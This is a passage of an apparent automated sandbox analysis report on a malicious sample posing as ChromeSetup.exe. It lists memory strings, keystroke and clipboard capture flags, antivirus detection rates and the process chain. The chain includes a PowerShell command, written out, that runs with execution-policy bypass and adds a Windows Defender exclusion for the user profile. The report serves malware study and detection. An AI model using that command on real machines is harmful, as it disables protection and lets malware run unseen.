Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXResult/feature#
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXSource/feature
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stax.StAXResult/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stax.StAXSource/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature-
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamSource/feature
Source: javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://javax.xml.transform.stream.StreamSource/feature6
Source: ChromeSetup.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://openjdk.java.net/jeps/220).
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000005.00000002.1091230564.0000000004951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/java/monitor/address
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/code_sweeper/id
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/compiler/id
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/vm/gc/id
Source: javaw.exe, 00000002.00000002.3385302759.000000000A83D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html
Source: javaw.exe, 00000002.00000003.1078463404.0000000015805000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.0000000015805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.htmlL
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/
Source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javaseproducts/C:
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/is-standalone
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/enableExtensionFunctions
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo%
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
Source: javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit#
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager;
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xalan
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xpath/features/whitespace-pre-stripping
Source: javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.apache.org/xslt
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/external-parameter-entities8
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/namespacesv
Source: javaw.exe, 00000002.00000002.3385302759.000000000A5FD000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078204806.00000000157D4000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/string-interning
Source: javaw.exe, 00000002.00000003.1078204806.00000000157D4000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/string-interningfeature
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/features/validation
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/lexical-handler.
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/xml-string?
Source: powershell.exe, 00000005.00000002.1091230564.0000000004951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBAr
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: fxplugins.dll.0.dr, javafx_iio.dll.0.dr, java.dll.0.dr, t2k.dll.0.dr, bci.dll.0.dr, lcms.dll.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: svchost.exe, 00000007.00000003.1203071644.000001C7D6B43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000007.00000003.1203071644.000001C7D6B10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000005.00000002.1091230564.0000000004AA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1095173503.0000000007001000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 00000005.00000002.1093282660.00000000059B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\ChromeSetup.exe

0_2_004050F9

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\ChromeSetup.exe

0_2_004044E8

System Summary

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\ChromeSetup.exe

0_2_004038AF

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_0040737E	0_2_0040737E
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00406EFE	0_2_00406EFE
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_004079A2	0_2_004079A2
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_004049A8	0_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Code function: 1_2_00405D30	1_2_00405D30
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Code function: 1_2_004013B0	1_2_004013B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00EFB4D0	5_2_00EFB4D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00EFB4A8	5_2_00EFB4A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_083A3AA8	5_2_083A3AA8

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JAWTAccessBridge-32.dll 532D049E0D7A265754902C23B0F150D665A78A3D6FE09AD51C9BE8C29D574A3D

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: String function: 004062CF appears 57 times
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Code function: String function: 00406E10 appears 37 times

Uses 32bit PE files

Source: ChromeSetup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal63.evad.winEXE@13/217@0/2

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe

Code function: 1_2_00401ED0 GetLastError,puts,ShellExecuteA,printf,fclose,MessageBoxA,FormatMessageA,strlen,strcat,LocalFree,fprintf,fprintf,fprintf,

1_2_00401ED0

Source: C:\Users\user\Desktop\ChromeSetup.exe

0_2_004044E8

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00402535 CoCreateInstance,

0_2_00402535

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe

1_2_00404740

Source: C:\Users\user\Desktop\ChromeSetup.exe

File created: C:\Users\user\AppData\Local\RoadSpecialized-Launcher

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03

Source: C:\Users\user\Desktop\ChromeSetup.exe

File created: C:\Users\user\AppData\Local\Temp\nsmFBF2.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\97d84ae1f15f1791152b8995b44f6da3.bat

Source: ChromeSetup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ChromeSetup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ChromeSetup.exe	ReversingLabs: Detection: 47%
Source: ChromeSetup.exe	Virustotal: Detection: 40%

Source: ChromeSetup.exe	String found in binary or memory: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\lib\security
Source: RoadSpecialized-Launcher.exe	String found in binary or memory: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00
Source: RoadSpecialized-Launcher.exe	String found in binary or memory: -Dfile.encoding=UTF-8 -classpath "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe" org.develnext.jphp.ext.javafx.FXLauncher
Source: RoadSpecialized-Launcher.exe	String found in binary or memory: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher
Source: RoadSpecialized-Launcher.exe	String found in binary or memory: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe

Source: C:\Users\user\Desktop\ChromeSetup.exe

File read: C:\Users\user\Desktop\ChromeSetup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ChromeSetup.exe "C:\Users\user\Desktop\ChromeSetup.exe"
Source: C:\Users\user\Desktop\ChromeSetup.exe	Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe	Process created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe" org.develnext.jphp.ext.javafx.FXLauncher
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\97d84ae1f15f1791152b8995b44f6da3.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -Command Add-MpPreference -ExclusionPath $env:USERPROFILE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
